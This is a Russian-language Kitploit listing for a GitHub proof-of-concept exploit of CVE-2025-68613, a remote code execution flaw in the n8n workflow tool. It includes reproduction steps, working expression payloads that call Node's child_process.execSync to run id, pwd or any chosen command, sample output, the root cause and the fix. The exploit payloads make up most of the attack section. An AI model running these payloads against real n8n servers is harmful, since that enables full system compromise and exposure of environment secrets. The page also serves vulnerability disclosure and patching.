Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: n8n RCE эксплойт уязвимости и документация | Kitploit
Инструменты/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: n8n RCE эксплойт уязвимости и документация

Репозиторий
106228 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

n8n - CVE-2025-68613: Некорректный контроль динамически управляемых ресурсов кода

Уязвимость

n8n содержит критическую уязвимость произвольного выполнения кода в системе оценки выражений рабочих процессов. При определенных условиях выражения, предоставленные аутентифицированными пользователями во время конфигурации рабочего процесса, могут быть оценены в контексте выполнения, недостаточно изолированном от базовой среды выполнения.

Затронутые версии

  • Уязвимые: n8n < v1.122.0
  • Исправленные: n8n >= v1.122.0

Требования

  • Аутентифицированный доступ к экземпляру n8n
  • Возможность создавать/редактировать рабочие процессы

Шаги для воспроизведения

1. Создайте новый рабочий процесс

  • Нажмите "Add workflow"

2. Добавьте узлы

  • Добавьте узел "Manual Trigger"
  • Добавьте узел "Set" (подключенный к триггеру)

3. Настройте полезную нагрузку

  • Нажмите на узел Set
  • Нажмите "Add Value" → Выберите "String"
  • Назовите поле "result"
  • Нажмите на иконку "=", чтобы включить режим выражений

4. Вставьте полезную нагрузку

Вставьте эту полезную нагрузку в поле выражения:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. Выполните

  • Нажмите "Execute step"
  • Проверьте вывод узла Set на наличие результата команды

CVE-2025-68613 Exploit Demonstration

Примеры полезных нагрузок

Команда ID:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Команда PWD:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

Шаблон пользовательской команды:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

Ожидаемый вывод

Для команды id:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

Для команды pwd:

root@kitploit:~
/app

Коренная причина

В оценщике выражений отсутствует санитайзер, предотвращающий доступ функциональных выражений к this.process (объекту процесса Node.js), что позволяет получить доступ к системным модулям.

Воздействие

  • Произвольное выполнение команд
  • Доступ к файловой системе
  • Раскрытие переменных окружения
  • Полная компрометация системы

Смягчение

Обновитесь до n8n v1.122.0 или новее.

Ссылки

  • Исправление: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • Репозиторий: https://github.com/n8n-io/n8n
  • Сообщение в блоге : https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

Отказ от ответственности: Эта информация предоставлена только для использования в песочнице и в образовательных целях. Несанкционированное использование этой информации для эксплуатации систем является незаконным и неэтичным. Всегда получайте соответствующее разрешение перед тестированием или эксплуатацией уязвимостей.

Скачать инструмент